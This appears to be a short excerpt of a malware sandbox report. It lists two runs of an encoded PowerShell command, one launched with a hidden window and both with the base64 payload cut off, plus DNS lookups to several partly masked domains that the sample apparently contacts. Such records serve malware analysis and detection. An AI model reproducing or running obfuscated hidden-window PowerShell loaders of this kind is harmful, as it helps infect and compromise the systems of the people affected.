Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAATwBmAHcAbgBkAGcAaQBhAGMAaABkACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEsAbgBiAG4AeAB2AG4AYwB2AHkAIAAjAD4AIAAkAFQAZgBzAHcAagBkAHUAegB6AHEAPQAnAEMAagBy...
- DNS ASK te##.#cht-leben.com
- DNS ASK wp.######eurbookingsoftware.com
- DNS ASK ne#.##luonline.com
- DNS ASK kp###rowave.com
- DNS ASK ta#####doanhnhan.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAATwBmAHcAbgBkAGcAaQBhAGMAaABkACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEsAbgBiAG4AeAB2AG4AYwB2AHkAIAAjAD4AIAAkAFQAZgBzAHcAagBkAHUAegB6AHEAPQAnAEMAagBy...' (with hidden window)